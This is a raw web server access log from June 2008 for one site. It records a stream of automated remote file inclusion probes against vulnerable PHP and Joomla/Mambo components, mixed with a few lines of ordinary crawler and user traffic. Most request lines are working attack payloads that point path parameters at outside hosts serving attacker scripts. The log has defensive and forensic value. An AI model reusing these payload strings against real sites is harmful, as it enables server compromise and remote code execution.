62.75.204.30 - - [25/Jun/2008:09:49:39 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:09:49:39 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:09:50:31 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:09:51:11 -0700] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.187 - - [25/Jun/2008:09:51:34 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hostdehein.de//lcl/bilder/data/media/6/P1010161.JPG??? HTTP/1.1" 200 18589 "-" "libwww-perl/5.76" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:51:47 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.54.21.66 - - [25/Jun/2008:09:51:47 -0700] "GET /logs/index.php?option=com_comprofiler&mosConfig_absolute_path=http://warsector.ru//access2008.log? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:09:51:50 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.54.21.66 - - [25/Jun/2008:09:51:50 -0700] "GET /index.php?option=com_comprofiler&mosConfig_absolute_path=http://warsector.ru//access2008.log? HTTP/1.1" 200 18467 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.21.66 - - [25/Jun/2008:09:51:52 -0700] "GET /logs/access_080215.log/index.php?option=com_comprofiler&mosConfig_absolute_path=http://warsector.ru//access2008.log? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.21.66 - - [25/Jun/2008:09:52:08 -0700] "GET /logs/access.log/index.php?option=com_comprofiler&mosConfig_absolute_path=http://warsector.ru//access2008.log? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.101.194.252 - - [25/Jun/2008:09:52:37 -0700] "GET / HTTP/1.0" 200 18241 "-" "Nokia6300/2.0 (05.50) Profile/MIDP-2.0 Configuration/CLDC-1.1 (botmobi find.mobi/bot.html abuse@mtld.mobi)" "www.dmulk.com"
75.101.194.252 - - [25/Jun/2008:09:52:37 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "-" "Java/1.5.0_11" "dmulk.com"
75.101.194.252 - - [25/Jun/2008:09:52:38 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "-" "Java/1.5.0_11" "dmulk.com"
75.101.194.252 - - [25/Jun/2008:09:52:38 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://www.dmulk.com/" "Nokia6300/2.0 (05.50) Profile/MIDP-2.0 Configuration/CLDC-1.1 (botmobi find.mobi/bot.html abuse@mtld.mobi)" "dmulk.com"
72.29.73.67 - - [25/Jun/2008:09:52:39 -0700] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.101.194.252 - - [25/Jun/2008:09:52:41 -0700] "GET /wap/ HTTP/1.0" 404 275 "-" "Nokia6300/2.0 (05.50) Profile/MIDP-2.0 Configuration/CLDC-1.1 (botmobi find.mobi/bot.html abuse@mtld.mobi)" "www.dmulk.com"
75.101.194.252 - - [25/Jun/2008:09:52:41 -0700] "GET /m/ HTTP/1.0" 404 275 "-" "Nokia6300/2.0 (05.50) Profile/MIDP-2.0 Configuration/CLDC-1.1 (botmobi find.mobi/bot.html abuse@mtld.mobi)" "www.dmulk.com"
75.101.194.252 - - [25/Jun/2008:09:52:41 -0700] "GET /mobi/ HTTP/1.0" 404 275 "-" "Nokia6300/2.0 (05.50) Profile/MIDP-2.0 Configuration/CLDC-1.1 (botmobi find.mobi/bot.html abuse@mtld.mobi)" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:09:52:41 -0700] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
75.101.194.252 - - [25/Jun/2008:09:52:41 -0700] "GET /mobile/ HTTP/1.0" 404 275 "-" "Nokia6300/2.0 (05.50) Profile/MIDP-2.0 Configuration/CLDC-1.1 (botmobi find.mobi/bot.html abuse@mtld.mobi)" "www.dmulk.com"
75.101.194.252 - - [25/Jun/2008:09:52:42 -0700] "GET /imode/ HTTP/1.0" 404 275 "-" "Nokia6300/2.0 (05.50) Profile/MIDP-2.0 Configuration/CLDC-1.1 (botmobi find.mobi/bot.html abuse@mtld.mobi)" "www.dmulk.com"
75.101.194.252 - - [25/Jun/2008:09:52:42 -0700] "GET /xhtml/ HTTP/1.0" 404 275 "-" "Nokia6300/2.0 (05.50) Profile/MIDP-2.0 Configuration/CLDC-1.1 (botmobi find.mobi/bot.html abuse@mtld.mobi)" "www.dmulk.com"
156.17.223.158 - - [25/Jun/2008:09:53:16 -0700] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.lachsfarm.de/board//language/ctrl.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
156.17.223.158 - - [25/Jun/2008:09:53:16 -0700] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.lachsfarm.de/board//language/ctrl.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.246.63.118 - - [25/Jun/2008:09:53:33 -0700] "GET /logs/access_080319.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.injoyusa.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.98.71 - - [25/Jun/2008:09:53:51 -0700] "GET /logs/index.php?open=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [25/Jun/2008:09:53:55 -0700] "GET /index.php?open=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 18405 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:09:54:02 -0700] "GET /logs//main.php?sayfa=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:09:54:02 -0700] "GET //main.php?sayfa=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.246.62.50 - - [25/Jun/2008:09:54:07 -0700] "GET /phphtml.php?htmlclass_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:09:54:08 -0700] "GET //index2.php?sbjoke_id=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:09:54:08 -0700] "GET /logs//index2.php?sbjoke_id=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:09:54:27 -0700] "GET /common/func.php?CommonAbsDir=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:09:54:27 -0700] "GET /common/func.php?CommonAbsDir=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.55.48.7 - - [25/Jun/2008:09:54:45 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.55.48.7 - - [25/Jun/2008:09:54:45 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.55.48.7 - - [25/Jun/2008:09:54:45 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.84 - - [25/Jun/2008:09:55:21 -0700] "GET /logs/access_080304.log/?mosConfig_absolute_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.246.68.52 - - [25/Jun/2008:09:55:30 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.246.68.52 - - [25/Jun/2008:09:55:30 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.246.68.52 - - [25/Jun/2008:09:56:00 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.111.176.84 - - [25/Jun/2008:09:56:00 -0700] "GET /logs/access_080307.log/?mosConfig_absolute_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.246.68.52 - - [25/Jun/2008:09:56:01 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
213.188.172.6 - - [25/Jun/2008:09:56:04 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.188.172.6 - - [25/Jun/2008:09:56:04 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.188.172.6 - - [25/Jun/2008:09:56:04 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:09:56:27 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:09:56:29 -0700] "GET /logs/access.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:09:56:29 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:09:56:29 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:09:56:31 -0700] "GET /modules/My_eGallery/index.php?basepath=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.21.66 - - [25/Jun/2008:09:56:33 -0700] "GET /logs/index.php?option=com_comprofiler&mosConfig_absolute_path=http://warsector.ru//access2008.log? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.21.66 - - [25/Jun/2008:09:56:34 -0700] "GET /logs/access_080215.log/index.php?option=com_comprofiler&mosConfig_absolute_path=http://warsector.ru//access2008.log? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.21.66 - - [25/Jun/2008:09:56:35 -0700] "GET /index.php?option=com_comprofiler&mosConfig_absolute_path=http://warsector.ru//access2008.log? HTTP/1.1" 200 18483 "-" "libwww-perl/5.79" "www.dmulk.com"
68.8.232.250 - warboard [25/Jun/2008:09:56:46 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=3&order=FileNum&order_type=ASC HTTP/1.1" 200 33049 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=3&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [25/Jun/2008:09:56:48 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC HTTP/1.1" 200 32960 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=3&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [25/Jun/2008:09:56:51 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 32928 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [25/Jun/2008:09:56:58 -0700] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=640 HTTP/1.1" 200 7635 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
74.54.21.66 - - [25/Jun/2008:09:56:58 -0700] "GET /logs/access.log/index.php?option=com_comprofiler&mosConfig_absolute_path=http://warsector.ru//access2008.log? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:09:57:03 -0700] "GET /logs/index.php?open=http://fsm.upsi.edu.my//db/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:09:57:06 -0700] "GET /index.php?open=http://fsm.upsi.edu.my//db/albid.txt?? HTTP/1.1" 200 18387 "-" "libwww-perl/5.805" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:09:57:37 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:09:57:38 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:09:57:39 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.8.232.250 - warboard [25/Jun/2008:09:57:42 -0700] "POST /warboard/index.php?table_name=warboard_main&page=0&function=update&where_field=dataid&where_value=640 HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=640" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [25/Jun/2008:09:57:42 -0700] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=640&just_updated=1 HTTP/1.1" 200 7686 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=640" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [25/Jun/2008:09:57:44 -0700] "GET /warboard/index.php?table_name=warboard_main HTTP/1.1" 200 32998 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=640&just_updated=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [25/Jun/2008:09:57:46 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC HTTP/1.1" 200 32960 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.8.232.250 - warboard [25/Jun/2008:09:57:48 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 32935 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
218.239.223.69 - - [25/Jun/2008:09:58:59 -0700] "GET /logs/access.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.223.69 - - [25/Jun/2008:09:59:00 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.223.69 - - [25/Jun/2008:09:59:00 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:09:59:09 -0700] "GET /logs/access_080220.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.194 - - [25/Jun/2008:09:59:13 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://fwt.txdnl.com/6-30/a/l/alpaci/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.87.100 - - [25/Jun/2008:09:59:58 -0700] "GET /logs//1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.87.100 - - [25/Jun/2008:09:59:58 -0700] "GET //1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [25/Jun/2008:10:00:20 -0700] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [25/Jun/2008:10:00:20 -0700] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [25/Jun/2008:10:00:20 -0700] "GET //inc/cmses/aedating4CMS.php?dir[inc]=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [25/Jun/2008:10:00:20 -0700] "GET //inc/cmses/aedating4CMS.php?dir[inc]=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:10:00:38 -0700] "GET /logs/access_080312.log//include.php?path=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:10:00:38 -0700] "GET /logs//include.php?path=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:10:00:38 -0700] "GET //include.php?path=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:10:00:40 -0700] "GET /logs/access_080215.log//include.php?path=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.63.118 - - [25/Jun/2008:10:00:43 -0700] "GET /logs/access_080319.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.injoyusa.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
8.2.208.2 - - [25/Jun/2008:10:00:44 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
8.2.208.2 - - [25/Jun/2008:10:00:45 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:10:00:48 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.127.185 - - [25/Jun/2008:10:01:03 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.127.185 - - [25/Jun/2008:10:01:03 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:10:01:14 -0700] "GET /logs/?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 200 53419 "-" "libwww-perl/5.65" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:10:01:16 -0700] "GET /?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 200 18387 "-" "libwww-perl/5.65" "www.dmulk.com"
66.79.162.194 - - [25/Jun/2008:10:01:20 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.79.162.194 - - [25/Jun/2008:10:01:20 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:10:01:29 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:10:01:47 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:10:01:48 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:10:01:51 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.179.12 - - [25/Jun/2008:10:01:51 -0700] "GET /logs/access_080225.log//include.php?path=http://210.118.194.173/cj/rfi/22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:10:01:52 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.179.12 - - [25/Jun/2008:10:01:52 -0700] "GET //include.php?path=http://210.118.194.173/cj/rfi/22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.179.12 - - [25/Jun/2008:10:01:52 -0700] "GET /logs//include.php?path=http://210.118.194.173/cj/rfi/22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:10:01:59 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:10:02:04 -0700] "GET /logs/access_080225.log//include.php?path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:10:02:04 -0700] "GET //include.php?path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:10:02:05 -0700] "GET /logs//include.php?path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.188.172.6 - - [25/Jun/2008:10:02:14 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.188.172.6 - - [25/Jun/2008:10:02:16 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.188.172.6 - - [25/Jun/2008:10:02:16 -0700] "GET /phphtml.php?htmlclass_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:10:02:39 -0700] "GET /logs/access.log//include.php?path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.2.100.138 - - [25/Jun/2008:10:02:48 -0700] "GET /logs/index.php?go=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
